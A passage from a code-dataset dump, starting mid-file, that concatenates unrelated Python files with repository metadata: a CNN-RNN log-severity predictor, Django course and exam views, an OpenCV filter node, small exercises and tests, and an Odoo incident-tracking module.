logger.info("Plugin: %s is deprecated on plugin server, disabling here" % p.name)
p.description = 'WARNING: This plugin has been DEPRECATED on remote server!!!!\n'
p.status = False
p.save()
return True
def update_plugins():
pluginservers = PluginServer.objects.all()
for server in pluginservers:
if server.status:
logger.info("Fetching from %s" % server.name)
pluginpoller(server)
else:
logger.info("Server at %s ignored." % server.name)
| [
"[email protected]"
]
| |
0da2a858c8b43266110789edbbd9fbfc44c0485f | 0ca9e6a6fa9a05231d2248e9991c50d74173e546 | /B0_CNN-RNN-text/predict2.py | d19a91c2ae46186a8cd09254b83dc0537f1e4037 | []
| no_license | Timaos123/LogstashAI | 8aa07b74c0bfd46ab9bd4ff6b10549057e36c477 | 0b9ec6a27ebc07584503dc69e29475e98ebc102b | refs/heads/master | 2020-04-02T14:34:48.648972 | 2018-10-24T16:44:41 | 2018-10-24T16:44:41 | 154,530,107 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 5,365 | py | import os
import sys
import json
import shutil
import pickle
import logging
import data_helper
import numpy as np
import pandas as pd
import tensorflow as tf
from text_cnn_rnn import TextCNNRNN
logging.getLogger().setLevel(logging.INFO)
def load_trained_params(trained_dir):
params = json.loads(open(trained_dir + 'trained_parameters.json').read())
words_index = json.loads(open(trained_dir + 'words_index.json').read())
labels = json.loads(open(trained_dir + 'labels.json').read())
with open(trained_dir + 'embeddings.pickle', 'rb') as input_file:
fetched_embedding = pickle.load(input_file)
embedding_mat = np.array(fetched_embedding, dtype = np.float32)
return params, words_index, labels, embedding_mat
def load_test_data(test_file, labels):
df = pd.read_csv(test_file)
df.loc[df.severity=="crit","severity"]=1
df.loc[df.severity=="err","severity"]=1
df.loc[df.severity!=1,"severity"]=0
# print(df)
select = ['message']
df = df.dropna(axis=0, how='any', subset=select)
test_examples = df[select[0]].apply(lambda x: data_helper.clean_str(x).split(' ')).tolist()
num_labels = len(labels)
one_hot = np.zeros((num_labels, num_labels), int)
np.fill_diagonal(one_hot, 1)
label_dict = dict(zip(labels, one_hot))
y_ = None
if 'severity' in df.columns:
select.append('severity')
y_ = df[select[1]].apply(lambda x: label_dict[x]).tolist()
not_select = list(set(df.columns) - set(select))
df = df.drop(not_select, axis=1)
return test_examples, y_, df
def map_word_to_index(examples, words_index):
x_ = []
for example in examples:
temp = []
for word in example:
if word in words_index:
temp.append(words_index[word])
else:
temp.append(0)
x_.append(temp)
return x_
def getRP(preY,testY):
yP=list(zip(preY,testY))
tp=0
fp=0
tn=0
fn=0
for yPItem in yP:
if yPItem[0]==yPItem[1] and yPItem[1]==1:
tp=tp+1
if yPItem[0]!=yPItem[1] and yPItem[1]==1:
fp=fp+1
if yPItem[0]==yPItem[1] and yPItem[1]==0:
tn=tn+1
if yPItem[0]!=yPItem[1] and yPItem[1]==0:
fn=fn+1
recall=tp/(tp+fp)
precision=tp/(tp+fn)
return recall,precision
def predict_unseen_data():
trained_dir = "./trained_results_1524214944/"
if not trained_dir.endswith('/'):
trained_dir += '/'
test_file = "valData.csv"
params, words_index, labels, embedding_mat = load_trained_params(trained_dir)
x_, y_, df = load_test_data(test_file, labels)
x_ = data_helper.pad_sentences(x_, forced_sequence_length=params['sequence_length'])
x_ = map_word_to_index(x_, words_index)
x_test, y_test = np.asarray(x_), None
if y_ is not None:
y_test = np.asarray(y_)
timestamp = trained_dir.split('/')[-2].split('_')[-1]
predicted_dir = './predicted_results_' + timestamp + '/'
if os.path.exists(predicted_dir):
shutil.rmtree(predicted_dir)
os.makedirs(predicted_dir)
with tf.Graph().as_default():
session_conf = tf.ConfigProto(allow_soft_placement=True, log_device_placement=False)
sess = tf.Session(config=session_conf)
with sess.as_default():
cnn_rnn = TextCNNRNN(
embedding_mat = embedding_mat,
non_static = params['non_static'],
hidden_unit = params['hidden_unit'],
sequence_length = len(x_test[0]),
max_pool_size = params['max_pool_size'],
filter_sizes = map(int, params['filter_sizes'].split(",")),
num_filters = params['num_filters'],
num_classes = len(labels),
embedding_size = params['embedding_dim'],
l2_reg_lambda = params['l2_reg_lambda'])
def real_len(batches):
return [np.ceil(np.argmin(batch + [0]) * 1.0 / params['max_pool_size']) for batch in batches]
def predict_step(x_batch):
feed_dict = {
cnn_rnn.input_x: x_batch,
cnn_rnn.dropout_keep_prob: 1.0,
cnn_rnn.batch_size: len(x_batch),
cnn_rnn.pad: np.zeros([len(x_batch), 1, params['embedding_dim'], 1]),
cnn_rnn.real_len: real_len(x_batch),
}
predictions = sess.run([cnn_rnn.predictions], feed_dict)
return predictions
checkpoint_file = trained_dir + 'best_model.ckpt'
saver = tf.train.Saver(tf.all_variables())
saver = tf.train.import_meta_graph("{}.meta".format(checkpoint_file))
saver.restore(sess, checkpoint_file)
logging.critical('{} has been loaded'.format(checkpoint_file))
batches = data_helper.batch_iter(list(x_test), params['batch_size'], 1, shuffle=False)
predictions, predict_labels = [], []
for x_batch in batches:
batch_predictions = predict_step(x_batch)[0]
for batch_prediction in batch_predictions:
predictions.append(batch_prediction)
predict_labels.append(labels[batch_prediction])
# Save the predictions back to file
df['NEW_PREDICTED'] = predict_labels
columns = sorted(df.columns, reverse=True)
df.to_csv(predicted_dir + 'predictions_all.csv', index=False, columns=columns)
if y_test is not None:
y_test = np.array(np.argmax(y_test, axis=1))
accuracy = sum(np.array(predictions) == y_test) / float(len(y_test))
logging.critical('The prediction accuracy is: {}'.format(accuracy))
recall,precision=getRP(np.array(predictions),y_test)
logging.critical('The prediction Recall and Precision are: {},{}'.format(recall,precision))
logging.critical('Prediction is complete, all files have been saved: {}'.format(predicted_dir))
if __name__ == '__main__':
# python3 predict.py ./trained_results_1478563595/ ./data/small_samples.csv
predict_unseen_data()
| [
"[email protected]"
]
| |
25d5fc581028991eafab2166d9a68b78fd919440 | 9de28c08400250025f4bdc5676bac3b82f4a404d | /Unified/assignSchema.py | fb2db6eb24f398dbbfc3540c186ddfbc2babaa93 | []
| no_license | AndrewLevin/WmAgentScripts | f4b8edb6b668d128e12d55b396c67f9efb727e6f | 4eab70df00d7a314a4d7d115e1eb0dbdac823165 | refs/heads/master | 2020-12-31T03:35:14.564731 | 2016-12-06T20:37:51 | 2016-12-06T20:37:51 | 14,967,465 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,692 | py | import os
import sys
from sqlalchemy import Column, ForeignKey, Integer, String, PickleType, Float
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import relationship
from sqlalchemy import create_engine
Base = declarative_base()
#class McMID(Base):
# __tablename__ = 'mcm'
# id = Column(Integer, primary_key=True)
# pid = Column(String(400))
# ## and whatever else you want
class Workflow(Base):
__tablename__ = 'workflow'
id = Column(Integer, primary_key=True)
name = Column(String(400))
status = Column(String(30),default='considered') ## internal status
wm_status = Column(String(30),default='assignment-approved') ## status in req manager : we might not be carrying much actually since we are between ass-approved and assigned, although announced is coming afterwards
fraction_for_closing = Column(Float,default=0.90)
class Output(Base):
__tablename__ = 'output'
id = Column(Integer, primary_key=True)
datasetname = Column(String(400))
nlumis = Column(Integer)
expectedlumis = Column(Integer)
nevents = Column(Integer)
nblocks = Column(Integer)
dsb_status = Column(String(30)) ## in DBS ?
status = Column(String(30))
## workflow it belongs to
workfow_id = Column(Integer,ForeignKey('workflow.id'))
workflow = relationship(Workflow)
date = Column(Integer)
class Transfer(Base):
__tablename__ = 'transfer'
id = Column(Integer, primary_key=True)
phedexid = Column(Integer)
workflows_id = Column(PickleType)
#status = Column(String(30)) ## to be added ?
engine = create_engine('sqlite:///Unified/assignRecord.db')
Base.metadata.create_all(engine)
| [
"[email protected]"
]
| |
89d42651a7c265a1445be2fc09631bf0afbe9c41 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02818/s265134890.py | 8482530bc7f94733b76388fa8ccee8aa0e5fd826 | []
| no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 679 | py | #!/usr/bin/env python3
# Generated by https://github.com/kyuridenamida/atcoder-tools
from typing import *
import collections
import functools
import itertools
import math
import sys
INF = float('inf')
def solve(A: int, B: int, K: int):
return f'{max(A-K,0)} {max(B-max(0,K-A),0)}'
def main():
sys.setrecursionlimit(10 ** 6)
def iterate_tokens():
for line in sys.stdin:
for word in line.split():
yield word
tokens = iterate_tokens()
A = int(next(tokens)) # type: int
B = int(next(tokens)) # type: int
K = int(next(tokens)) # type: int
print(f'{solve(A, B, K)}')
if __name__ == '__main__':
main()
| [
"[email protected]"
]
| |
9d871e6ca56da43854bf44e0d344e875c0c9981e | 2ed4ed28dc150a96954c663f203808ba917712c8 | /learning_site/tracks/views.py | e6c04e087c767566263f7b3f4718117d88d2d770 | []
| no_license | Mostacosta/Mosta-learning-website | 66e813c6fe17b018d750ffa824df751428a20ce8 | a70e94649355e07a5d819e75b09100f7dc5ccc59 | refs/heads/master | 2022-04-01T17:36:23.084318 | 2020-02-04T08:56:37 | 2020-02-04T08:56:37 | 200,877,940 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,211 | py | from django.shortcuts import render
from django.http import HttpResponse,JsonResponse
from .models import track,course,lesson,exam,exam_result
from questions.models import question ,answer
from questions.forms import question_form
from datetime import datetime
import dateutil.parser
from django.utils import timezone
from django.views.decorators.cache import cache_page
import random
from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger
from django.contrib.auth.decorators import login_required
from django.contrib import messages
# Create your views here.
def track_list(request):
tracks = track.objects.all()
page = request.GET.get('page', 1)
paginator = Paginator(tracks, 3)
try:
tracks = paginator.page(page)
except PageNotAnInteger:
tracks = paginator.page(1)
except EmptyPage:
tracks = paginator.page(paginator.num_pages)
return render (request,'tracks/track-list.html',{"tracks":tracks})
def course_list(request,pk):
my_track = track.objects.get(pk=pk)
courses = course.objects.filter(track=my_track).order_by("order")
points = my_track.points.split(",")
lessons_ = []
for course_ in courses:
lessons = lesson.objects.filter(course=course_)
lessons_.append(lessons)
zip_ = zip(courses,lessons_)
if request.user.is_authenticated:
pass
else:
messages.error(request,"login to be able to preview lessons")
return render (request,'tracks/course-details.html',{"courses":zip_,"track":my_track,"len":len(courses),"points":points})
def lesson_list(request,pk):
my_course = course.objects.get(pk=pk)
lessons = lesson.objects.filter(course=my_course)
return render (request,'tracks/lesson_list.html',{"lessons":lessons,"course":my_course.name})
def lesson_view (request,pk):
form = question_form()
lesson_ = lesson.objects.get(pk=pk)
if request.method == "POST":
form = question_form(request.POST,request.FILES)
if form.is_valid():
ques_=form.save(commit=False)
ques_.user = request.user
ques_.lesson=lesson_
form.save()
questions = question.objects.filter(lesson=lesson_)
answers = []
for question_ in questions :
answers.append(answer.objects.filter(question=question_))
zip_list = zip (questions,answers)
return render (request,"questions/answer_list.html",{"zip":zip_list,"form":form})
def lesson_watch (request,pk):
lesson_ = lesson.objects.get(pk=pk)
if request.user not in lesson_.watching_users.all():
lesson_.watching_users.add(request.user)
lesson_.save()
return HttpResponse("watched")
@login_required(redirect_field_name="contacts:signup")
@cache_page(60)
def exam_view (request,pk):
course_ = course.objects.get(pk=pk)
questions = sorted(exam.objects.filter(course=course_),key=lambda x: random.random())
try:
result = exam_result.objects.get(course=course_,user=request.user)
except :
result = None
if result :
last_time = result.date
last_time = last_time.replace(tzinfo=None)
dif = datetime.now()-last_time
dif = dif.total_seconds()
expire_date = 259200*result.times
hours = expire_date//(60*60)
if dif < expire_date:
return HttpResponse ("comeback after"+str(hours))
if request.method == "POST":
if request.session.get('time'):
time_ = request.session.get('time')
past_time = dateutil.parser.parse(time_)
now_time = datetime.now()
dif = now_time-past_time
dif = dif.total_seconds()
if dif is not None and dif<1800:
score = 0
for question in questions:
if question.right_answer == request.POST[question.name]:
score +=1
precentage = (score/len(questions)) * 100
if precentage > 50 :
if request.user not in course_. succeeded_users.all():
course_. succeeded_users.add(request.user)
course_.save()
if result:
result.case = 'success'
result.times =1
result.date = timezone.now()
result.degree=precentage
else:
result =exam_result(user=request.user,course=course_,case='success',degree=precentage)
result.save()
return HttpResponse ("you succed")
else :
if result:
result.case = 'failed'
result.times +=1
result.date = timezone.now()
result.degree=precentage
else:
result =exam_result(user=request.user,course=course_,case='failed',degree=precentage)
result.save()
return HttpResponse ("you failed")
else:
return HttpResponse ("no session")
else:
request.session['time'] = datetime.now().isoformat()
print(request.session['time'])
return render (request,'tracks/exam.html',{"questions":questions})
| [
"[email protected]"
]
| |
df3a6464a3e0334638d68082c12f2f987f3ce943 | be1b836b022a52204bc862878ba8d7a9200bd59b | /website/unicode/create_json.py | afea12542356f37620cc445dfd70b497d34b720d | [
"MIT"
]
| permissive | templateK/write-math | b418e7c40a59ce2e673f5804b1c042acd8eb527b | ece645f70341431ac7ca14740ce26ad8153a3900 | refs/heads/master | 2021-01-18T21:48:14.725324 | 2016-05-17T17:57:22 | 2016-05-17T17:57:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 824 | py | #!/usr/bin/env python
"""
Create a json file which maps unicode decimal codepoints to descriptions.
https://github.com/w3c/xml-entities is used for that.
"""
import json
data = {}
import xml.etree.ElementTree
e = xml.etree.ElementTree.parse('xml-entities/unicode.xml').getroot()
for atype in e.findall('charlist'):
print("## Charlist found")
for character in atype.findall('character'):
try:
dec = int(character.get('dec'))
desc = ''
for description in character.findall('description'):
desc = description.text
# print("%s: - %s" % (dec, desc))
data[dec] = desc
except:
# Just ignore errors
pass
with open('unicode.json', 'w') as outfile:
json.dump(data, outfile, sort_keys=True, indent=1)
| [
"[email protected]"
]
| |
f0ed3ca2be636e6ff87f3318f3e243f68762b6f4 | 4bc24011c65cb5194eb94abfd8d394a6b0dc6a50 | /packages/OpenCV/nodes/OpenCV___BilateralFilter0/OpenCV___BilateralFilter0.py | 6f78c7fc2a7dc5946060fcc88fa05dad405492c9 | [
"MIT"
]
| permissive | ManojKumarTiwari/Ryven | 6c76ebdf89599bb7c9b4ce020f195eea135d9da1 | 2b8ef0bdcf05a458a6cf8791cbc2fda6870932f8 | refs/heads/master | 2022-11-12T00:23:45.303378 | 2020-07-08T09:32:10 | 2020-07-08T09:32:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,485 | py | from custom_src.NodeInstance import NodeInstance
from custom_src.Node import Node
from custom_src.retain import m
import cv2
# USEFUL
# self.input(index) <- access to input data
# self.outputs[index].set_val(val) <- set output data port value
# self.main_widget <- access to main widget
class BilateralFilter_NodeInstance(NodeInstance):
def __init__(self, parent_node: Node, flow, configuration=None):
super(BilateralFilter_NodeInstance, self).__init__(parent_node, flow, configuration)
# self.special_actions['action name'] = self.actionmethod ...
self.img_unfiltered = None
self.img_filtered = None
self.initialized()
def update_event(self, input_called=-1):
self.img_unfiltered = self.input(0)
d_val = self.input(1)
d_val = int(d_val)
sigmaColor_val=self.input(2)
sigmaColor_val=int(sigmaColor_val)
sigmaSpace_val=self.input(3)
sigmaSpace_val=int(sigmaSpace_val)
self.img_filtered = cv2.bilateralFilter( self.img_unfiltered, d_val, sigmaColor_val,sigmaSpace_val)
self.main_widget.show_image(self.img_filtered)
self.set_output_val(0, self.img_filtered)
def get_data(self):
data = {}
# ...
return data
def set_data(self, data):
pass
# ...
# optional - important for threading - stop everything here
def removing(self):
pass
| [
"[email protected]"
]
| |
0c8e3e9921b7d630d6e0adc83c74f296d3c6d153 | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_196/ch63_2020_04_27_14_18_42_371021.py | c92ce60be1971d984d7ff5df1eb20c1502c28393 | []
| no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 78 | py | def nome_usuario(str):#isabellabvo@
a = [::- pos_arroba(str)]
return a | [
"[email protected]"
]
| |
49aad707822cea050e45c3f070042ccf5c2f2dba | a8123a86db99b9365b10ba76dd509d58caa7bc10 | /python/practice/start_again/2020/11032020/Assesment6.py | c505235f1844afeeb02c99144c972776b142ec93 | []
| no_license | smohapatra1/scripting | c0404081da8a10e92e7c7baa8b540acc16540e77 | 3628c9109204ad98231ae8ee92b6bfa6b27e93cd | refs/heads/master | 2023-08-22T20:49:50.156979 | 2023-08-22T20:43:03 | 2023-08-22T20:43:03 | 147,619,016 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 216 | py | #Use List Comprehension to create a list of the first letters of every word in the string below:
st = 'Create a list of the first letters of every word in this string'
mylist=[w[0] for w in st.split()]
print (mylist) | [
"[email protected]"
]
| |
4e8b7d7b60995bf843c9a4de85b38976e365d990 | 84a1f9d626828b6ecaee4ef037081f4d8750a990 | /编程/4月/4.13/test_survey.py | 9c1c877c16243557dde6b28b5c1afc599957f8ed | []
| no_license | dujiaojingyu/Personal-programming-exercises | 5a8f001efa038a0cb3b6d0aa10e06ad2f933fe04 | 72a432c22b52cae3749e2c18cc4244bd5e831f64 | refs/heads/master | 2020-03-25T17:36:40.734446 | 2018-10-01T01:47:36 | 2018-10-01T01:47:36 | 143,986,099 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,840 | py | __author__ = "Narwhale"
# import unittest
# from survey import AnonymousSurvey
#
# class TestAnonymousSurvey(unittest.TestCase):
# '''测试survey.py'''
# def test_store_single_response(self):
# '''测试单个答案会不会妥善储存'''
# question = "What langage did you first learn to speak?"
# my_survey = AnonymousSurvey(question)
# my_survey.store_response('English')
# self.assertIn('English',my_survey.responses)
#
# def test_store_three_response(self):
# '''测试三个答案会不会妥善储存'''
# question = "What langage did you first learn to speak?"
# my_survey = AnonymousSurvey(question)
# responses = ['English','Spanish','Mandarin']
# for response in responses:
# my_survey.store_response(response)
# for response in responses:
# self.assertIn(response,my_survey.responses)
#
import unittest
from survey import AnonymousSurvey
class TestAnonymousSurvey(unittest.TestCase):
'''测试survey.py'''
def setUp(self):
'''创建一个调查对象和一答案,供使用的测试方法使用'''
question = "What langage did you first learn to speak?"
self.my_survey = AnonymousSurvey(question)
self.responses = ['English','Spanish','Mandarin']
def test_store_single_response(self):
'''测试单个答案会不会妥善储存'''
self.my_survey.store_response(self.responses[0])
self.assertIn(self.responses[0],self.my_survey.responses)
def test_store_three_response(self):
'''测试三个答案会不会妥善储存'''
for response in self.responses:
self.my_survey.store_response(response)
for response in self.responses:
self.assertIn(response,self.my_survey.responses)
| [
"[email protected]"
]
| |
9de052555dc7ee6ed65cad5a454df3b5f3f305ae | f7a20374403b55189cc5db6e8fa34d0ba290387c | /modules/incidents/incidents.py | 6d49906a1da357b35110f8d5cd751a05e35475d1 | []
| no_license | dark-ice/upink_modules | 1a7b5a165cc5e05396c62cf33c261b907c23e33c | c497bf87a39796f1df3877542359b1927bec3a76 | refs/heads/master | 2021-05-01T04:40:16.436666 | 2014-04-12T15:09:31 | 2014-04-12T15:09:31 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,945 | py | # -*- encoding: utf-8 -*-
from datetime import datetime, timedelta
import pytz
from openerp import tools
from openerp.osv import fields, osv
from openerp.osv.orm import Model
STATES = (
('draft', 'Черновик'),
('completion', 'На доработке инициатором'),
('decision', 'Принятие решения'),
('in_pipeline', 'В работе'),
('completion_performer', 'На доработке исполнителем'),
('approval', 'Сдано на утверждение'),
('accepted', 'Принято инициатором'),
('cancel', 'Отмена'),
)
def format_date_tz(date, tz=None):
if isinstance(date, str):
date = datetime.strptime(date, "%Y-%m-%d %H:%M:%S").replace(tzinfo=pytz.utc)
if tz is None:
tz = pytz.timezone(tools.detect_server_timezone())
f = tools.DEFAULT_SERVER_DATETIME_FORMAT
return tools.server_to_local_timestamp(date, f, f, tz)
def parse_timedelta(timedelta_str):
if 'day' in timedelta_str:
timedelta_str.replace(' days, ', ':')
timedelta_str.replace(' day, ', ':')
return timedelta_str
def str_to_seconds(timedelta_str):
total_seconds = 0
timedelta_list = timedelta_str.split(':')
total_seconds += int(timedelta_list[-1])
total_seconds += int(timedelta_list[-2]) * 60
total_seconds += int(timedelta_list[-3]) * 60 * 60
if len(timedelta_list) == 4:
total_seconds += int(timedelta_list[-3]) * 60 * 60 * 24
return total_seconds
class Incidents(Model):
_name = 'ink.incidents'
_description = u'Реестр инцидентов INK'
_order = "id desc"
def change_person(self, cr, user, ids, person_id, type='author', context=None):
department_str = '{0}_department_id'.format(type)
parent_str = '{0}_parent_id'.format(type)
for person in self.pool.get('hr.employee').read(cr, user, [person_id], ['department_id', 'parent_id'], context):
department = 0
parent = 0
if person['department_id']:
department = person['department_id'][0]
if person['parent_id']:
parent = person['parent_id'][0]
return {'value': {department_str: department, parent_str: parent}}
def _check_access(self, cr, uid, ids, name, arg, context=None):
"""
Динамически определяет роли на форме
"""
employee_pool = self.pool.get('hr.employee')
employee = employee_pool.get_employee(cr, uid, uid)
res = {}
for record in self.read(cr, uid, ids, ['author_id', 'author_parent_id', 'performer_id', 'performer_parent_id']):
access = str()
# Автор
if (record['author_id'] and record['author_id'][0] == employee.id) \
or (record['author_parent_id'] and record['author_parent_id'][0] == employee.id):
access += 'a'
# Ответственный
if (record['performer_id'] and record['performer_id'][0] == employee.id) \
or (record['performer_parent_id'] and record['performer_parent_id'][0] == employee.id):
access += 'p'
val = False
letter = name[6]
if letter in access:
val = True
res[record['id']] = val
return res
_columns = {
'id': fields.integer('№', size=11, select=True),
'create_date': fields.datetime('Дата создания', readonly=True),
'author_id': fields.many2one('hr.employee', 'Инициатор', readonly=True),
'author_department_id': fields.related(
'author_id',
'department_id',
relation='hr.department',
type='many2one',
string='Направление инициатора',
store=True
),
'author_parent_id': fields.related(
'author_id',
'parent_id',
relation='hr.employee',
type='many2one',
string='Руководитель инициатора',
store=True
),
'name': fields.char(
'Тема инцидента',
size=250,
readonly=True,
states={
'draft': [('readonly', False), ('required', True)],
'completion': [('readonly', False), ('required', True)]
}),
'description': fields.text(
'Описание инцидента',
readonly=True,
states={
'draft': [('readonly', False), ('required', True)],
'completion': [('readonly', False), ('required', True)]
}
),
'type': fields.selection(
(
('fail', 'Сбой в работе'),
('issues', 'Текущие вопросы'),
), 'Тип инцидента',
readonly=True,
states={
'draft': [('readonly', False), ('required', True)],
'completion': [('readonly', False), ('required', True)]
}
),
'document_type': fields.selection(
(
('cash-memo', 'Товарный чек'),
('invoice', 'Счет на оплату'),
('mail', 'Почтовая отправка'),
('receipt for repairs', 'Квитанция о ремонте'),
('bill', 'Товарная (расходная) накладная'),
('movement', 'Накладная на перемещение'),
), 'Тип документа',
readonly=True,
states={
'draft': [('readonly', False)],
'completion': [('readonly', False)]
}
),
'document_number': fields.char(
'№ документа',
size=250,
readonly=True,
states={
'draft': [('readonly', False)],
'completion': [('readonly', False)]
}),
'performer_id': fields.many2one(
'hr.employee',
'Ответственный исполнитель',
readonly=True,
states={
'draft': [('readonly', False), ('required', True)],
'completion': [('readonly', False), ('required', True)]
}
),
'performer_department_id': fields.related(
'performer_id',
'department_id',
relation='hr.department',
type='many2one',
string='Направление исполнителя',
store=True
),
'performer_parent_id': fields.related(
'performer_id',
'parent_id',
relation='hr.employee',
type='many2one',
string='Руководитель исполнителя',
store=True
),
'deadline_date': fields.datetime(
'Срок исполнения',
readonly=True,
states={
'draft': [('readonly', False), ('required', True)],
'completion': [('readonly', False), ('required', True)]
}),
'time_over_decision': fields.char('Время превышения принятия решения', size=20, readonly=True),
'time_over_waiting_initiator': fields.char('Время превышения ожидания ответа инициатора', size=20, readonly=True),
'time_over_deadlines': fields.char('Время превышения сроков выполнения', size=20, readonly=True),
'state': fields.selection(STATES, 'Статус', size=100, readonly=True),
'history_ids': fields.one2many('ink.incidents.history', 'incident_id', 'История переходов', readonly=True),
'fallback': fields.text(
'Обратная связь от исполнителя',
),
'comment_completion': fields.text(
'Комментарий по доработке (от исполнителя)',
),
'comment_approval': fields.text(
'Комментарий по доработке (от инициатора)',
),
'comment_ids': fields.one2many('ink.incidents.comment', 'incident_id', 'Инцидент', readonly=False),
# Права
'check_a': fields.function(
_check_access,
method=True,
string='Проверка на инициатора',
type='boolean',
invisible=True
),
'check_p': fields.function(
_check_access,
method=True,
string='Проверка на ответственного',
type='boolean',
invisible=True
),
}
_defaults = {
'author_id': lambda s, c, u, cnt: s.pool.get('hr.employee').get_employee(c, u, u).id,
'state': 'draft',
'check_a': True,
}
def write(self, cr, user, ids, vals, context=None):
history_pool = self.pool.get('ink.incidents.history')
next_state = vals.get('state', False)
check_date = datetime.now(pytz.utc)
for record in self.browse(cr, user, ids, context):
if next_state and next_state != record.state:
if record.state == 'decision':
if record.history_ids:
new_delta_seconds = 0
state_date = datetime.strptime(record.history_ids[-1].create_date, "%Y-%m-%d %H:%M:%S").replace(tzinfo=pytz.utc)
delta = check_date - state_date
record_delta = 0
if record.time_over_decision:
record_delta = str_to_seconds(record.time_over_decision)
if delta.seconds > 3600:
new_delta_seconds = record_delta + delta.seconds + delta.days*3600*24 - 3600
vals['time_over_decision'] = parse_timedelta(str(timedelta(seconds=new_delta_seconds)))
if record.state == 'completion' and next_state == 'decision':
if record.history_ids:
new_delta_seconds = 0
record_delta = 0
state_date = datetime.strptime(record.history_ids[-1].create_date, "%Y-%m-%d %H:%M:%S").replace(tzinfo=pytz.utc)
delta = check_date - state_date
if record.time_over_waiting_initiator:
record_delta = str_to_seconds(record.time_over_waiting_initiator)
if delta.seconds > 3600:
new_delta_seconds = record_delta + delta.seconds + delta.days*3600*24 - 3600
vals['time_over_waiting_initiator'] = parse_timedelta(str(timedelta(seconds=new_delta_seconds)))
if next_state == 'accepted':
new_delta_seconds = 0
record_delta = 0
state_date_deadline = datetime.strptime(record.deadline_date, "%Y-%m-%d %H:%M:%S").replace(tzinfo=pytz.utc)
if record.time_over_deadlines:
record_delta = str_to_seconds(record.time_over_deadlines)
delta = check_date - state_date_deadline
if delta.days >= 0:
new_delta_seconds = record_delta + delta.seconds + delta.days*3600*24
vals['time_over_deadlines'] = parse_timedelta(str(timedelta(seconds=new_delta_seconds)))
if record.state == 'in_pipeline' and next_state == 'approval' and not record['fallback'] and not vals.get('fallback'):
raise osv.except_osv('', 'Нужно заполнить "Обратная связь от исполнителя"')
if next_state == 'completion' and not record['comment_completion'] and not vals.get('comment_completion'):
raise osv.except_osv('', 'Нужно заполнить "Комментарий по доработке (от исполнителя)"')
if next_state == 'completion_performer' and not record['comment_approval'] and not vals.get('comment_approval'):
raise osv.except_osv('', 'Нужно заполнить "Комментарий по доработке (от инициатора)"')
vals.update({'history_ids': [(0, 0, {'name': next_state})]})
return super(Incidents, self).write(cr, user, ids, vals, context)
def add_note(self, cr, uid, ids, context=None):
view_id = self.pool.get('ir.ui.view').search(
cr,
uid,
[('name', 'like', 'ink.incidents.add.note.form1')]
)
return {
'view_type': 'form',
'view_mode': 'form',
'res_model': 'ink.incidents.comment',
'name': 'Комментарий',
'view_id': view_id,
'type': 'ir.actions.act_window',
'context': {
'incident_id': ids[0],
},
'target': 'new',
'nodestroy': True,
}
Incidents()
class IncidentsHistory(Model):
_name = 'ink.incidents.history'
_description = u'Реестр инцидентов INK - История переводов'
_columns = {
'name': fields.selection(STATES, 'Статус', size=100, readonly=True),
'create_date': fields.datetime('Дата и время перевода'),
'create_uid': fields.many2one('res.users', 'Перевел'),
'incident_id': fields.many2one('ink.incidents', 'Инцидент'),
}
IncidentsHistory()
class IncidentsComment(Model):
_name = 'ink.incidents.comment'
_description = u'Реестр инцидентов INK - Комментарии'
_columns = {
'name': fields.text('Комментарий'),
'create_date': fields.datetime('Дата и время создания'),
'create_uid': fields.many2one('res.users', 'Автор'),
'incident_id': fields.many2one('ink.incidents', 'Инцидент', invisible=True),
}
def action_add(self, cr, uid, ids, context=None):
if context is None:
context = {}
incident = context.get('incident_id')
for obj in self.browse(cr, uid, ids, context=context):
self.write(
cr,
uid,
obj.id,
{
'name': obj.name,
'incident_id': incident
})
return {'type': 'ir.actions.act_window_close'}
IncidentsHistory() | [
"[email protected]"
]
| |
c0ca10e6617bcc841033face0deb5832c499e704 | 3de69270140c915a71611b07f9e5ae7e0ba5d3e6 | /hedgehog/__init__.py | af439387011fcc89560aa07bba8500c8a529cdb3 | [
"MIT"
]
| permissive | dongyu1990/hedgehog | f66380f77751d2dd6dc8d888ed4634d3cc8d9225 | 98c97d0c70b4aa01b0bfb1115a1dfbe18f976ae9 | refs/heads/master | 2022-09-15T14:21:15.701239 | 2020-05-31T13:12:40 | 2020-05-31T13:12:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 405 | py | import os
from .bayes_net import BayesNet
from .examples import load_alarm
from .examples import load_asia
from .examples import load_grades
from .examples import load_sprinkler
__all__ = [
'BayesNet',
'load_alarm',
'load_asia',
'load_grades',
'load_sprinkler'
]
def cli_hook():
here = os.path.dirname(os.path.realpath(__file__))
os.system(f'streamlit run {here}/gui.py')
| [
"[email protected]"
]
| |
f2a49225a1fc85adf7640b670ac6c14374ae7785 | 280342a3961132a6f62507e17cb0dadf3598f2ea | /models/extends_financiera_prestamo_cuota.py | 96a9a2953247b4107c7c846ec38bf120d3c9ebfe | []
